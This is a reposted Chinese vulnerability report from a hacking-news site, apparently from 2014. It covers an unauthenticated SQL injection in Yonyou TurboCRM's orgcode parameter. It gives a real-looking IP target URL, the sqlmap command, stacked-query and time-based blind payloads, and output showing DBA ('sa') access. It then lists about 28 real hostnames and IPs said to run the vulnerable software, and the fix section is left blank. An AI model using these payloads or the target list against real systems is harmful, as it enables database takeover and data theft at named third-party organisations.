记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

用友CRM注入漏洞(无需登录通杀所有版本)

2014-10-03 13:25

漏洞url:

http://220.178.27.116:8001/webservice/service.php?class=WS_System&orgcode=1



使用sqlmap进行注入。

sqlmap.py -u "http://220.178.27.116:8001/webservice/service.php?class=WS_System&orgcode=1" --current-user --current-db  --is-dba



sqlmap identified the following injection points with a total of 0 HTTP(s) reque sts: 

--- Place: GET

Parameter: orgcode

Type: stacked queries

Title: Microsoft SQL Server/Sybase stacked queries

Payload: class=WS_System&orgcode=1'; WAITFOR DELAY '0:0:5'--

Type: AND/OR time-based blind

Title: Microsoft SQL Server/Sybase time-based blind

Payload: class=WS_System&orgcode=1' WAITFOR DELAY '0:0:5'--

---



current user: 'sa' 

current database: 'turbocrm70'

current user is DBA: True



整理出了以下使用这套crm的网站,title:用友TurboCRM

182.135.191.86



111.40.0.242:9091



222.171.32.36:9091



219.90.119.35:8081



180.168.98.94:8088



prm.yonyou.com



www.kdlian.com:8001



prm.chanjet.com



qinyuancrm.com



kfdq369.gicp.net



220.113.5.194



218.84.134.162:8088



turbocrm.yofc.com



crm.elfa.com.cn



crm.pearmain.cn



nc.shineroad.com



crm.westernpower.cn



crm7.abgroup.cn



crm.transn.net



zh4433.vicp.net



218.108.86.226



crm.yiwenkeji.com:8080



218.95.66.88:9036



crm.digisystem.com.cn:8080



crm.shineroad.com



crm.siweidg.com



222.41.174.190:8088

漏洞证明:

sqlmap.py -u "http://220.178.27.116:8001/webservice/service.php?class=WS_System&orgcode=1" --current-user --current-db  --is-dba



sqlmap identified the following injection points with a total of 0 HTTP(s) reque sts: 

--- Place: GET

Parameter: orgcode

Type: stacked queries

Title: Microsoft SQL Server/Sybase stacked queries

Payload: class=WS_System&orgcode=1'; WAITFOR DELAY '0:0:5'--

Type: AND/OR time-based blind

Title: Microsoft SQL Server/Sybase time-based blind

Payload: class=WS_System&orgcode=1' WAITFOR DELAY '0:0:5'--

---



current user: 'sa' 

current database: 'turbocrm70'

current user is DBA: True



t0132dce2159f711de2.png

修复方案:

.....................

知识来源: www.wooyun.org/bugs/wooyun-2014-067800

阅读:208628 | 评论:0 | 标签:注入 漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“用友CRM注入漏洞(无需登录通杀所有版本)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云